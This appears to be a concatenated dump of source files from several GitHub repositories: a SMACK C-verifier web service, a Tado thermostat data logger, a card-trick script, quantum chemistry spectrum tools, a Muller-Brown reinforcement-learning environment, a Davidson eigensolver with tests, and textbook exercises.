//__VERIFIER_nondet() : Is used to permit assigned memory to have unconstrained values
//assume(): Is used to enforce constraints on specified regions of memory
//assert(): Is used to prove some assertions on values in the program. Assertions may contain unconstrained values
int main() {
int x = __VERIFIER_nondet();
int n = __VERIFIER_nondet();
assume(n>=0);
assert(x+n > x);
return 0;
}"""
func_ptr_fail ="""#include "smack.h"
//As demonstrated here, we can prove the correctness of functions for the entire range of input values
int incr(int x) {
return ++x;
}
int decr(int x) {
return --x;
}
int main(void) {
int (*fp)(int);
int x = __VERIFIER_nondet(), y = __VERIFIER_nondet(), old_x = x;
if (y > 0) {
fp = incr;
} else {
fp = decr;
}
x = fp(x);
assert(x == old_x-1 || x == old_x+1);
return 0;
}"""
loop = """#include "smack.h"
//By specifying a sufficient loop unroll factor, we can reason about loops.
//Specify the loop unroll factor here with the syntax @LU:<unroll count>@ E.g: @LU:8@
void initDescArray(int number[], int size)
{
int i;
for(i=size-1;i>=0;i--)
number[i]=i;
}
int main()
{
int num[6], size = 6;
int i = __VERIFIER_nondet();
initDescArray(num,size);
if(i >= 1 && i < 6)
assert(num[i] > num[i-1]);
}"""
complicated_function = """#include "smack.h"
//We can prove properties of return values of procedures for all possible input parameters
int foo(int x, int y) {
int a;
if (x < y) {
a = 3;
} else if (x > y) {
a = 2;
} else {
a = 1;
}
a++;
if (a > 2) {
a--;
if (x < 0) {
a++; x++;
} else {
a--; x--;
}
} else {
if (y < 0) {
a--; y--;
} else {
a++; y++;
}
}
if (x == a && y == a) {
a--;
}
return a;
}
int main(void) {
int b;
b = foo(__VERIFIER_nondet(), __VERIFIER_nondet());
assert(b != 0);
return 0;
}"""
limit_multiply="""#include "smack.h"
//Though support by the theorem prover is limited for multiplication, we can solve some equations
int main(void) {
int x, y, z, a, b;
x = 4;
y = 3;
z = 19;
a = __VERIFIER_nondet();
b = __VERIFIER_nondet();
if(a>=0 && b>=0)
assert(z != (a*x+b*y));
return 0;
}"""
structcast = """#include <stdio.h>
#include <stdlib.h>
#include "smack.h"
//Memory is modeled to match the C specification
typedef struct {
int a;
int b;
} S1;
typedef struct {
int x;
} S2;
int main(void) {
S1 s1;
S2* p2 = (S2*)(&s1);
s1.a = 3;
p2->x = 4;
assert(s1.a == 4);
return 0;
}"""
tutorialsource = """SMACK is a SMACK is a tool for statically checking properties of programs written in C/C++.
For a given input program, SMACK checks for violations of user-provided assertions.
The tool is open-source and integrates into the well-known LLVM compiler infrastructure.\r\n
There are 3 types of annotations that SMACK allows the user to specify. They are the assert, assume and nondet statements.\r\n
Assert: Allows the user to specify a predicate on the variables in scope. SMACK statically checks the assertion in this
program location. The predicate P can be specified in an assert in the syntax assert(P) \r\n
Assume: Assume statement allows the user to specify the assumptions of the program from the point of specification. If the
assumption is denoted by A, assume(A) is the syntax for specifying it. Eg: assume(n > 0)
Nondet: Allows the user to specify a "random" value. This is specified by __VERIFIER_nondet(). The statement returns a
nondeterministic type safe value."""
metadata = {
"Name": "smack",
"DisplayName": "SMACK",
"Version": version,
"Email": "<EMAIL>",
"SupportEmail": "<EMAIL>",
"TermsOfUseUrl": "https://github.com/smackers/smack/",
"PrivacyUrl": "https://github.com/smackers/smack/",
"Institution": "University of Utah",
"InstitutionUrl": "https://github.com/smackers/smack/",
"InstitutionImageUrl": "https://dl.dropboxusercontent.com/u/93242277/smack-logo.png",
"MimeType": "text/x-c",
"SupportsLanguageSyntax": True,
"Title": "Verifier for C/C++ Programs",
"Description": "At its core, SMACK is a translator from the LLVM compiler's popular intermediate representation (IR) into the Boogie intermediate verification language (IVL). Sourcing LLVM IR exploits an increasing number of compiler frontends, optimizations, and analyses. Targeting Boogie exploits a canonical platform which simplifies the implementation of algorithms for verification, model checking, and abstract interpretation. The main purpose of SMACK is to decouple the implementations of verification algorithms from the details of source languages, and enable rapid prototyping on production code.",
"Question": "Are there any assertion violations in this program?",
"Url": "https://github.com/smackers/smack/",
"Samples": [
{
"Name": "simple proof",
"Source": rise_simple
},
{
"Name": "simple buggy example",
"Source": rise_simple_buggy
},
{
"Name": "function pointers",
"Source": func_ptr_fail
},
{
"Name": "loops and arrays",
"Source": loop
},
{
"Name": "procedure summaries",
"Source": complicated_function
},
{
"Name": "solving equations",
"Source": limit_multiply
},
{
"Name": "structures",
"Source": structcast
}
]
}
class TestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
try:
if self.path.startswith("/metadata"):
body = json.dumps(metadata)
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Content-Length', len(body))
self.send_header('Expires', '-1')
self.send_header('Cache-Control', 'no-cache')
self.send_header('Cache-Control', 'no-store')
self.send_header('Cache-Control', 'must-revalidate')
self.send_header('Cache-Control', 'max-age=0')
self.send_header('Pragma', 'no-cache')
self.end_headers()
self.wfile.write(body)
self.wfile.flush()
self.connection.shutdown(1)
return
if self.path.endswith("language"):
return
return
except IOError:
print 'IOError'
self.send_error(404,'File Not Found: %s' % self.path)
def do_POST(self):
length = int(self.headers.getheader('content-length'))
data_string = self.rfile.read(length)
data = json.loads(data_string)
f = open("rollingcount",'r')
x = int(f.read())+1
filename = 'input_'+str(x)
f.close()
f = open("rollingcount",'w')
f.write(str(x))
f.close()
f = open(filename+'.c', 'w')
f.write(data["Source"])
f.close()
regulex = re.match(r".*@LU:(?P<lu>\d+)@.*", data["Source"],re.DOTALL)
if(regulex):
lucount = regulex.groupdict()["lu"]
else:
lucount = '2'
f = open('logs','a')
p = subprocess.Popen(["timeout","10s",'smackverify.py', '--unroll', lucount, filename + '.c', '-o', filename +'.bpl'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
smack_string = p.communicate()
return_code = p.returncode
if not return_code == 0:
if return_code == 124:
resp = "Program is taking unusually long to verify. Request timed out."
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": resp
}
]
}
f.write(self.client_address[0]+"--"+filename+".c--"+"Timed Out\n")
f.close()
else:
output = smack_string[0].replace(filename+'.c', 'input.c')
output = output.split(' ')
error = []
smack = ''
for i in range(len(output)):
if(output[i] == "error:" or output[i] == "warning:"):
error.append(i)
for i in range(len(error)):
t = output[error[i]-1].split(':')
flag =1
if(output[error[i]-1] == 'fatal'):
flag = 0
if(i < len(error)-1 and flag):
m = output[error[i]].split(':')
j = error[i]+1
while 1:
if('\n' in output[j]):
break
j = j+1
haha = output[j].find('\n')
output[j] = output[j][0:haha]
p = output[error[i]+1:j+1]
we = " "
p = we.join(p)
if(len(t) < 3 or len(m) < 1):
smack = smack+" SMACK Error\r\n"
else:
smack = smack+"input.c("+t[1]+","+t[2]+") : "+m[0]+" "+str(i)+": "+p+"\r\n"
elif(i == len(error)-1 and flag):
m = output[error[i]].split(':')
j = error[i]+1
while 1:
if('\n' in output[j]):
break
j = j+ 1
haha = output[j].find('\n')
output[j] = output[j][0:haha]
p = output[error[i]+1:j+1]
we = " "
p = we.join(p)
if(len(t) >= 3 or len(m) >= 1):
smack = smack+"input.c("+t[1]+","+t[2]+") : "+m[0]+" "+str(i)+": "+p+"\r\n"
else:
smack = smack+" SMACK Error\r\n"
if(smack == ''):
smack = "SMACK Error"
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": smack
}
]
}
f.write(self.client_address[0]+"--"+filename+".c--"+"SMACK Error\n")
f.close()
else:
outp = smack_string[0].replace(filename+'.c', 'input.c')
output = outp.split(' ')
output = [i for i in output if '$' not in i]
for i in range(len(output)):
if '):' in output[i]:
output[i]=output[i][0:len(output[i])-1]+"\n"
t=" "
smack = t.join(output)
g = open(filename+".output",'w')
g.write(smack)
g.close()
f.write(self.client_address[0]+"--"+filename+".c--"+"Output\n")
f.close()
if('not hold' in outp):
temp = smack.split('\n')
temp = [w for w in temp if w != '']
response = temp[0]+"\r\n"
flag = 1
cnt = 0
for i in range(len(temp)):
if('input' in temp[i] and flag):
response = response+temp[i]+" : error main: This assertion might not hold\r\n"
flag = 0
elif('input' in temp[i] and flag == 0):
response = response+temp[i]+" : Trace Element: Error trace["+str(cnt)+"]\r\n"
cnt = cnt +1
response = response + temp[len(temp)-1]
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": response
}
]
}
else:
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": smack
}
]
}
f.close()
body = json.dumps(smack_response)
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Content-Length', len(body))
self.send_header('Expires', '-1')
self.send_header('Cache-Control', 'no-cache')
self.send_header('Cache-Control', 'no-store')
self.send_header('Cache-Control', 'must-revalidate')
self.send_header('Cache-Control', 'max-age=0')
self.send_header('Pragma', 'no-cache')
self.end_headers()
self.wfile.write(body)
self.wfile.flush()
os.system("rm "+filename+".b*")
self.connection.shutdown(1)
return
def start_server():
server_address = ("", PORT)
server = BaseHTTPServer.HTTPServer(server_address, TestHandler)
server.serve_forever()
if __name__ == "__main__":
start_server()
``` |
{
"source": "jjgibson/PyTadoLog",
"score": 2
} |
#### File: PyTadoLog/pytadolog/datalogger.py
```python
import concurrent.futures
import getpass
import json
import logging
import multiprocessing
import pathlib
import sched
import time
from urllib.error import HTTPError, URLError
import keyring
import numpy as np
from .datastores import DataStore, MPDataStore
from .extended_interface import TadoExtended
from .utils import nexttick, loglistener, setuplogger, setupoutdir
_LOGGER = logging.getLogger(__name__)
class TadoLogger:
"""Periodically requests TaDo data and passes to dataframe."""
CREDPATH = pathlib.Path.home() / ".tado_credentials"
def __init__(
self,
outdir=None,
update_period=30,
last_day="sun",
multiproc=True,
loglevel=logging.WARNING,
):
"""Constructs TaDo logger to update at update_periods.
Args:
outdir (path like, optional): Output direct to store csvs and logs.
Defaults to None which places files in <home>/Documents/TadoLogs/.
update_period (int, optional): Time in seconds between update.
Defaults to 30.
last_day (str, optional): Three letter weekday string indicating
last day of week stored in csv files. Defaults to 'sun'.
multiproc (bool, optional): Run datastore in another process.
Defaults to True.
loglevel (logging level, optional): Level to log at. Defaults to
logging.WARNING.
"""
self.update_period = update_period
self.lastday = last_day
self._multiproc = multiproc
self._loglevel = loglevel
self._outdir = setupoutdir(outdir)
self.event = None # Will hold next update event
self.scheduler = sched.scheduler(time.time, time.sleep)
self._logqueue = multiprocessing.Queue(-1)
self._stopev = multiprocessing.Event()
self._loglistener = multiprocessing.Process(
target=loglistener,
args=(self._outdir, self._logqueue, self._stopev, self._loglevel),
)
self._loglistener.start()
setuplogger(_LOGGER, self._logqueue, self._loglevel)
_LOGGER.info("---STARTED TADOLOGGER---")
self.variables = {
"Weather": ("Outside Temp (°C)", "Solar Int. (%)", "Weather"),
"Zones": (
"Temp (°C)",
"R.H. (%)",
"Set Temp (°C)",
"Heating Power (%)",
"Open Window",
),
}
_LOGGER.info("Logging into TaDo server")
self.login()
self.zones = sorted(self.home.getZones(), key=lambda z: z["id"])
_LOGGER.debug("Found %s zones in home", len(self.zones))
if self._multiproc:
self._q = multiprocessing.JoinableQueue()
self.pdstore = MPDataStore(
self.variables,
self.zones,
self._outdir,
self.update_period,
self.lastday,
self._logqueue,
self._loglevel,
self._q,
self._stopev,
)
else:
self.pdstore = DataStore(
self.variables,
self.zones,
self._outdir,
self.update_period,
self.lastday,
self._logqueue,
self._loglevel,
)
def __enter__(self):
_LOGGER.debug("PyTadoLog context manager entered")
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
_LOGGER.debug("PyTadoLog context manager exiting")
if exc_type is not None:
_LOGGER.exception(
"Error encountered during operation",
exc_info=(exc_type, exc_value, exc_traceback),
)
self.close()
def login(self):
"""Log in to TaDo mobile server.
Check if credentials are stored using default OS credentials manager
and prompts for new credentials if required.
"""
if not self.CREDPATH.exists():
_LOGGER.error(
"Credentials file cannot be found - Enter Tado credentials",
)
self.setcredentials()
loggedin = False
while not loggedin:
try:
with open(self.CREDPATH, mode="r") as f:
credentials = json.load(f)
except json.decoder.JSONDecodeError:
_LOGGER.error(
"Credentials file is corrupted - reenter Tado credentials",
)
self.setcredentials()
else:
try:
self.home = TadoExtended(
credentials["username"],
keyring.get_password(
credentials["service"], credentials["username"]
),
)
except HTTPError:
_LOGGER.error(
"Tado username or password is incorrect - reenter credentials",
)
self.setcredentials()
else:
loggedin = True
_LOGGER.debug("Logged into TaDo server")
def setcredentials(self, service="tado"):
"""Prompt user to enter TaDo login credentials.
Args:
service (str, optional): Name of TaDo service in default OS
credentials manager. Defaults to 'tado'.
Stores the service name and username in self.CREDPATH.
"""
_LOGGER.debug("Requesting TaDo username from user")
username = str(input("Enter Tado username: "))
with open(self.CREDPATH, "w") as f:
_LOGGER.debug("Saving TaDo credentials details to %s", self.CREDPATH)
json.dump({"service": service, "username": username}, f)
keyring.set_password(service, username, getpass.getpass())
_LOGGER.debug("TaDo credentials stored in OS credentials manager")
def update(self, t):
"""Get new data and append to dataframe then schedule next update.
Args:
t (datetime.datetime): Scheduled time of current update.
"""
if self._multiproc:
self._q.put((t, self.getnewdata()))
else:
self.pdstore.update(t, self.getnewdata())
# Schedule the next update
start_time = nexttick(self.update_period)
_LOGGER.debug("Update scheduled for %s", start_time)
print(f"Next update scheduled for {start_time}", end="\r", flush=True)
self.event = self.scheduler.enterabs(
time.mktime(start_time.timetuple()),
1,
self.update,
argument=(start_time,),
)
def getnewdata(self):
"""Get latest data from TaDo server and add to dataframe.
Uses multithreaded pool to get data simultaneously.
"""
with concurrent.futures.ThreadPoolExecutor(
max_workers=len(self.zones) + 1
) as executor:
# Load the operations then wait for them all to complete
futures = [executor.submit(self.getweatherdata)]
futures.extend(
[executor.submit(self.getzonedata, zone) for zone in self.zones]
)
futures, _ = concurrent.futures.wait(futures, timeout=30)
return [future.result() for future in futures]
def getzonedata(self, zone):
"""Get data on requested zone from TaDo server.
Args:
zone (int): ID for TaDo Zone.
Returns:
tuple: Tuple containing Zone data.
Uses try/except clauses to handle server downtime.
"""
try:
climate = self.home.getClimate(zone["id"])
except (URLError, TypeError):
# If the server doesn't respond continue running
# TypeError is raised if there is no response
_LOGGER.warning("Could not get climate for %s", zone["name"])
climate = {"temperature": np.nan, "humidity": np.nan}
try:
state = self.home.getHeatingState(zone["id"])
except (URLError, TypeError):
# If the server doesn't respond continue running
_LOGGER.warning("Could not get heating state for %s", zone["name"])
state = {"temperature": np.nan, "power": np.nan}
try:
window = self.home.getOpenWindow(zone["id"])
except (URLError, TypeError):
# If the server doesn't respond continue running
_LOGGER.warning("Could not get window state for %s", zone["name"])
window = np.nan
_LOGGER.debug("Got all data for %s", zone["name"])
out = (
zone["name"],
(
climate["temperature"],
climate["humidity"],
state["temperature"],
state["power"],
window,
),
)
return ("Zones", out)
def getweatherdata(self):
"""Get weather data from TaDo server.
Returns:
tuple: TaDo weather data.
Uses try/except clauses to handle server downtime.
"""
try:
data = self.home.getWeather()
dataout = (
data["outsideTemperature"]["celsius"],
data["solarIntensity"]["percentage"],
data["weatherState"]["value"],
)
except (URLError, TypeError):
# If the server doesn't respond continue running
# TypeError is raised if there is no response
_LOGGER.debug("Could not get weather data")
dataout = (np.nan, np.nan, np.nan)
out = ("Weather", dataout)
return ("Weather", out)
def start(self):
"""Start running the data logger.
Sets up the dataframe and schedules the first update.
"""
start_time = nexttick(self.update_period)
self.event = self.scheduler.enterabs(
time.mktime(start_time.timetuple()),
1,
self.update,
argument=(start_time,),
)
_LOGGER.info("First data point scheduled for %s", start_time)
if self._multiproc:
self.pdstore.start()
self.scheduler.run()
def close(self):
"""Clean up any scheduled events."""
if self.scheduler is not None:
if not self.scheduler.empty():
_LOGGER.debug("Cancelling scheduled event")
self.scheduler.cancel(self.event)
if self._multiproc:
self._stopev.set()
_LOGGER.debug("Set stop event")
self._q.join()
_LOGGER.debug("Datastore process stopped")
if __name__ == "__main__":
import datetime as dt
with TadoLogger() as tl:
tl.start()
print(f"Logging ended at {dt.datetime.now()}")
```
#### File: PyTadoLog/pytadolog/extended_interface.py
```python
from PyTado.interface import Tado
class TadoExtended(Tado):
"""Extends the PyTado interface to provide additional methods."""
def getHeatingState(self, zone):
"""Gets set temperature (centigrade) and heating power (%) for Zone zone."""
data = self.getState(zone)
return {
"temperature": data["setting"]["temperature"]["celsius"],
"power": data["activityDataPoints"]["heatingPower"]["percentage"],
}
def getOpenWindow(self, zone):
"""Gets open window status for Zone zone."""
if self.getState(zone)["openWindow"] is None:
return False
else:
return True
``` |
{
"source": "jj-github93/Mind-Reader",
"score": 4
} |
#### File: jj-github93/Mind-Reader/mind_reader_WIP.py
```python
import random
names = ["1","2","3","4","5","6","7","8","9","10","J","Q","K"]
suits = ["Spades","Hearts","Clubs","Diamonds"]
def createADeck():
deck = []
for s in suits:
for v in names:
deck.append((v,"of",s))
return deck
deck = createADeck()
random.shuffle(deck)
initialFour = random.sample(deck, 4)
print(initialFour)
memory = input("Memorise a Card from the given options and i will make it disappear! \nPress the enter key when you are ready! ")
random.shuffle(initialFour)
oldThree = initialFour[0:3]
newCard = random.sample(deck, 1)
newHand = oldThree + newCard
random.shuffle(newHand)
print(newHand)
mindFreak = input("Did I manage to remove the card you were thinking of?(y or n): ")
if mindFreak == "y":
print("I am the best Mind-Reader!!!")
else:
print("I will try again :(")
``` |
{
"source": "jjgoings/cq_realtime",
"score": 3
} |
#### File: jjgoings/cq_realtime/cq_realtime.py
```python
from __future__ import division
import sys
import numpy as np
import matplotlib.pyplot as plt
from scipy.fftpack import fft, fftfreq
from cs import CS
def cqRealTime(real_time_file,dipole_direction,kick_strength,damp_const,cs=False):
'''
(C) <NAME> 2016
CQ_RealTime.py: a post-processing script for computing the absorption spectrum of
Real Time Time Dependent SCF jobs in Chronus Quantum
Computes the energy range, w (in eV) and dipole strength function S(w) for
a given real time TD-SCF run.
real_time_file ... type:string ; the RealTime_Dipole.csv file from a ChronusQ run
dipole_direction ... type:char ; which dipole moment contribution is computed (e.g. 'x','y', or 'z')
kick_strength ... type:float ; in a.u., what was the applied field strength (e.g. 0.0001 au)
damp_const ... type:float ; in a.u. of time, gives FWHM of 1/damp_const
cs ... type:boolean; if True, do compressed sensing instead of Fourier Transform
'''
# chronusq file is CSV, also skip the header (first row)
rt = np.genfromtxt(real_time_file,skip_header=1,delimiter=',')
length = len(rt)
if cs == True:
# Reduce sample size
print "Reducing time sample size to 1000"
if length > 1000:
length = 1000
# print warning if you override the defaults
if length > 1000:
print "Time series too long! CS will take FOREVER."
print "Reduce the size of your time series."
# choose which dipole axis you want
if dipole_direction.lower() == 'x':
direction = 2
elif dipole_direction.lower() == 'y':
direction = 3
elif dipole_direction.lower() == 'z':
direction = 4
else:
print "Not a valid direction for the dipole! Try: x,y,z "
sys.exit(0)
t = rt[:int(length),0]
# note 'z' is just generic dipole direction, converted from debye to au
z = rt[:int(length),direction]*0.393456
# scale dipole signal
z0 = z[0]
z = z - z0
# add damping to give Lorenztian lineshape with FWHM of (2/damp_const)
damp = np.exp(-(t-t[0])/damp_const)
z = z * damp
# pad signal with zeros. also not necessary, but makes spectra prettier
#zero = np.linspace(0,0,10000)
#z = np.hstack((z,zero))
if cs == True:
# do compressed sensing
try:
import cs
except ImportError, e:
cs = False
fw_im = CS(z)
if cs == False:
# do fourier transform instead
fw = fft(z)
fw_re = np.real(fw) # the real FFT frequencies
fw_im = (np.imag(fw)) # the imaginary FFT frequencies
fw_abs = abs(fw) # absolute value of frequencies
# determine frequency range
n = len(fw_im) # number samples, including padding
timestep = t[1] - t[0] # spacing between time samples; assumes constant time step
w = fftfreq(n,d=timestep)*2.0*np.pi # frequency list
# 'correct' equation for dipole strength function assuming you did SCF in static field
#S = (2.0*w*w*fw_re)/(3.0*np.pi*137*kick_strength)
# 'correct' equation for dipole strength function assuming you did a delta kick
S = -(4.0*w*np.pi*fw_im)/(3.0*137*kick_strength)
# you can print the integrated dipole strength function ... should equal number of electrons
#from scipy.integrate import simps
#idx = np.where((w >= 0.0) & (w <=10000.0))
#integral = simps(S[idx],w[idx])
w = (w*27.2114) # give frequencies in eV
return w, S
if __name__ == '__main__':
xFilename = 'h2o_x_RealTime_Dipole.csv'
yFilename = 'h2o_y_RealTime_Dipole.csv'
zFilename = 'h2o_z_RealTime_Dipole.csv'
kick = 0.0001 # depends on system
damping = 150.0 # anywhere between 50-250 usually works well
doCS = False # if True, do compressed sensing technique
w, Sxx = cqRealTime(xFilename,'x',kick,damping,cs=doCS)
w, Syy = cqRealTime(yFilename,'y',kick,damping,cs=doCS)
w, Szz = cqRealTime(zFilename,'z',kick,damping,cs=doCS)
if doCS == True:
plt.plot(w,abs(Sxx+Syy+Szz)/np.linalg.norm(Sxx+Syy+Szz),label='S')
plt.ylim(0.0,0.01) # y range
if doCS == False:
plt.plot(w,Szz+Syy+Sxx,label='S')
plt.ylim(0.0,1.0) # y range
plt.xlim(0.0,30) # X range
plt.legend()
plt.xlabel(' Energy / eV ')
plt.ylabel(' Intensity / arbitrary units ')
#plt.show()
plt.savefig('h2o_absorption.pdf')
```
#### File: jjgoings/cq_realtime/cs_sklearn.py
```python
from __future__ import division
import numpy as np
import sys
from sklearn.linear_model import OrthogonalMatchingPursuit
from sklearn.linear_model import OrthogonalMatchingPursuitCV
def CSSK(h,const=5.0,noise=0.0000001):
"""Compressed Sensing replacement of Fourier Transform on 1D array h
* REQUIRES CVXPY PACKAGE *
h = sampled time signal
const = scalar multiple dimension of h, larger values give greater
resolution albeit with increased cost.
noise = scalar constant to account for numerical noise
returns:
g = fourier transform h to frequency domain using CS technique
"""
h = np.asarray(h, dtype=float)
Nt = len(h)
Nw = int(const*Nt)
t = np.arange(Nt)
w = np.arange(Nw)
#F = np.sin(2 * np.pi * np.outer(t,w) / Nw)
F = (1/np.float(Nw))*np.sin(2.0*np.pi*np.outer(t,w)/np.float(Nw))
#omp_cv = OrthogonalMatchingPursuit(n_nonzero_coefs=n_nonzero_coefs)
#omp_cv = OrthogonalMatchingPursuitCV(verbose=True,normalize=True)
omp_cv = OrthogonalMatchingPursuit(tol=noise)
omp_cv.fit(F, h)
coef = omp_cv.coef_
#idx_r, = coef.nonzero()
g = coef
### begin using cvxpy
#g = cvx.Variable(Nw)
## min |g|_1 subject to |F.g - h|_2 < noise
#objective = cvx.Minimize(cvx.norm(g,1))
#constraints = [cvx.norm(F*g - h,2) <= noise]
#prob = cvx.Problem(objective, constraints)
#prob.solve(solver='SCS',verbose=True)
#g = np.asarray(g.value)
#g = g[:,0]
### end using cvxpy
return g
if __name__ == '__main__':
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from scipy.fftpack import fftfreq, fft
t = np.arange(0,200,1.0)
h = (np.sin(2.0*t) + 2.0*np.sin(t) + 0.5*np.sin(1.5*t))
g = CSSK(h,10.0)
#g = np.imag(fft(h))
w = fftfreq(len(g),d=(t[1]-t[0]))*2.0*np.pi
plt.plot(w,abs(g))
plt.xlim(0,2.5)
plt.savefig('cs_sklearn.pdf')
``` |
{
"source": "jjgoings/gym-muller_brown",
"score": 2
} |
#### File: gym_muller_brown/envs/muller_brown_continuous.py
```python
import gym
import numpy as np
import matplotlib.pyplot as plt
from itertools import product
from gym import error, spaces, utils
from gym.utils import seeding
class MullerBrownContinuousEnv(gym.Env):
metadata = {'render.modes': ['human']}
def __init__(self):
# state space
self.x_min = -1.5
self.x_max = 1.0
self.y_min = -0.5
self.y_max = 2.0
self.observation_space = spaces.Box(low=np.array([self.x_min,self.y_min]),
high=np.array([self.x_max,self.y_max]),
dtype=float)
# action space
self.action_min = -1
self.action_max = 1
self.action_space = spaces.Box(low=self.action_min,
high=self.action_max,shape=(2,),dtype=float)
# precompute some energies for plotting PES
self.grid_points = 60
self.energies = np.empty((self.grid_points,self.grid_points))
x = np.linspace(self.x_min,self.x_max,self.grid_points)
y = np.linspace(self.y_min,self.y_max,self.grid_points)
for ix,iy in product(range(self.grid_points),range(self.grid_points)):
self.energies[ix,iy] = self.energy((x[ix],y[iy]))
self.reset()
def plotPES(self):
''' Renders the continuous Muller Brown PES (environment) '''
x = np.linspace(self.x_min,self.x_max,self.grid_points)
y = np.linspace(self.y_min,self.y_max,self.grid_points)
fig,ax = plt.subplots()
im = plt.pcolormesh(x,y,self.energies.T, cmap='GnBu_r', vmax=10,shading='nearest')
ax.set_aspect('equal')
cbar = fig.colorbar(im, ax=ax)
plt.xlabel('x')
plt.ylabel('y')
cbar.set_label('energy')
return fig
def render(self, mode='human'):
self.plotPES()
x,y = self.agent_position
plt.plot(x,y,marker='o',color='#C91A09',markersize=8)
def energy(self, state):
'''
Muller-Brown potential energy surface
Parameters:
state : integer pair (ix,iy) from state
energy : float
'''
x,y = state
A = [-200, -100, -170, 15]
a = [-1, -1, -6.5, 0.7]
b = [0, 0, 11, 0.6]
c = [-10, -10, -6.5, 0.7]
x0 = [1, 0, -0.5, -1]
y0 = [0, 0.5, 1.5, 1]
energy = 0.0
for k in range(len(x0)):
energy += (A[k]) *\
np.exp(a[k]*(x-x0[k])**2 +\
b[k]*(x-x0[k])*(y-y0[k]) +\
c[k]*(y-y0[k])**2)
return energy
def set_state(self, state):
self.agent_position = state
def is_off_grid(self, state):
x,y = state
if (x >= self.x_max) or (x <= self.x_min):
return True
elif (y >= self.y_max) or (y <= self.y_min):
return True
else:
return False
def step(self, action):
old_energy = self.energy(self.agent_position)
new_state = self.agent_position + 0.2*action
done = False # we don't have a pre-set endpoint
if not self.is_off_grid(new_state):
self.set_state(new_state)
new_energy = self.energy(new_state)
reward = old_energy - new_energy
return new_state, reward, done, {}
else:
reward = -1e2 # penalize off-grid moves
return self.agent_position, reward, done, {}
def reset(self):
new_position = self.observation_space.sample()
self.set_state(new_position)
return self.agent_position
if __name__ == '__main__':
env = MullerBrownContinuousEnv()
for _ in range(10):
obs,reward,_,_ = env.step(env.action_space.sample())
print(obs,reward)
env.render()
plt.pause(0.01)
plt.close()
``` |
{
"source": "jjgoings/McMurchie-Davidson",
"score": 2
} |
#### File: mmd/utils/davidson.py
```python
import numpy as np
import scipy
def davidson(A,roots,tol=1e-8):
mat_dim = A.shape[0]
sub_dim = 4*roots
V = np.eye(mat_dim,sub_dim)
converged = False
while not converged:
# subspace
S = np.dot(V.T,np.dot(A,V))
# diag subspace
E,C = scipy.linalg.eigh(S) # note already ordered if using eigh
E,C = E[:roots], C[:,:roots]
# get current approx. eigenvectors
X = np.dot(V,C)
# form residual vectors
R = np.zeros((mat_dim,roots))
Delta = np.zeros((mat_dim,roots))
unconverged = []
for j in range(roots):
R[:,j] = np.dot((A - E[j] * np.eye(mat_dim)),X[:,j])
if np.linalg.norm(R[:,j]) > tol:
unconverged.append(j)
# check convergence
if len(unconverged) < 1:
converged = True
for j in unconverged:
preconditioner = np.zeros(mat_dim)
for i in range(mat_dim):
if np.abs(E[j] - A[i,i]) < 1e-4:
continue # don't let preconditioner blow up -- keep as zero
else:
preconditioner[i] = -1/(A[i,i] - E[j])
# normalize correction vectors
Delta[:,j] = preconditioner * R[:,j]
Delta[:,j] /= np.linalg.norm(Delta[:,j])
# project corrections onto orthogonal complement
q = np.dot((np.eye(mat_dim) - np.dot(V,V.T)),Delta[:,j])
norm = np.linalg.norm(q)
if (norm > 1e-4):
if (sub_dim + 1 > min(500,mat_dim//4)):
# subspace collapse
print("Subspace too big: collapsing")
print("Eigs at current: ", E)
sub_dim = roots # restart uses best guess of eigenvecs
V = X
V, _ = np.linalg.qr(V)
break
else:
V_copy = np.copy(V)
sub_dim += 1
V = np.eye(mat_dim,sub_dim)
V[:,:(sub_dim-1)] = V_copy
# add new vector to end of subspace
V[:,-1] = q/norm
if converged:
return E, X
```
#### File: McMurchie-Davidson/tests/test019.py
```python
import numpy as np
from mmd.molecule import Molecule
from mmd.postscf import PostSCF
def test_cis():
water = """
0 1
O 0.000000 -0.075791844 0.000000
H 0.866811829 0.601435779 0.000000
H -0.866811829 0.601435779 0.000000
"""
# init molecule and build integrals
mol = Molecule(geometry=water,basis='3-21G')
# do the SCF
mol.RHF()
# now do FCI
PostSCF(mol).CIS()
# G16 reference UCIS excitation energies (full; no FC, 50-50, nosym)
# note I have manually expanded triplets in G16 to the full degeneracy
# because at this moment we don't handle spin conserved excitations
'''
#p cis(nstate=40,full) uhf/3-21G int=acc2e=14 nosymm
water
0 1
O 0.000000 -0.075791844 0.000000
H 0.866811829 0.601435779 0.000000
H -0.866811829 0.601435779 0.000000
'''
gau_ref = [6.5822,6.5822,6.5822,7.7597,7.8156,7.8156,7.8156,8.4377,8.4377, \
8.4377, 9.0903,9.0903,9.0903,9.3334,10.5493]
assert np.allclose(np.asarray(gau_ref),mol.cis_omega[:15])
```
#### File: McMurchie-Davidson/tests/test021.py
```python
import numpy as np
from mmd.utils.davidson import davidson
def test_davidson():
np.random.seed(0)
dim = 1000
A = np.diag(np.arange(dim,dtype=np.float64))
A[1:3,1:3] = 0
M = np.random.randn(dim,dim)
M += M.T
A += 1e-4*M
roots = 5
E, C = davidson(A, roots)
E_true, C_true = np.linalg.eigh(A)
E_true, C_true = E_true[:roots], C_true[:,:roots]
assert np.allclose(E, E_true)
``` |
{
"source": "JJGO/Intro-to-Computation-and-Programming",
"score": 4
} |
#### File: code/chapter 08/chapter8.py
```python
def is_smaller(x, y):
"""Assumes x and y are ints
Returns True if x is less than y and False otherwise."""
# # Code from page 150
def sqrt(x, epsilon):
"""Assumes x, epsilon floats
x >= 0
epsilon > 0
Returns result such that
x-epsilon <= result*result <= x+epsilon"""
# # Code from page 151
def copy(L1, L2):
"""Assumes L1, L2 are lists
Mutates L2 to be a copy of L1"""
while len(L2) > 0: #remove all elements from L2
L2.pop() #remove last element of L2
for e in L1: #append L1's elements to initially empty L2
L2.append(e)
# # Code to test copy (not in book)
# L1 = [1,2,3]
# L2 = [4,5,6]
# copy(L1, L2)
# print(L2)
# copy(L1, L1)
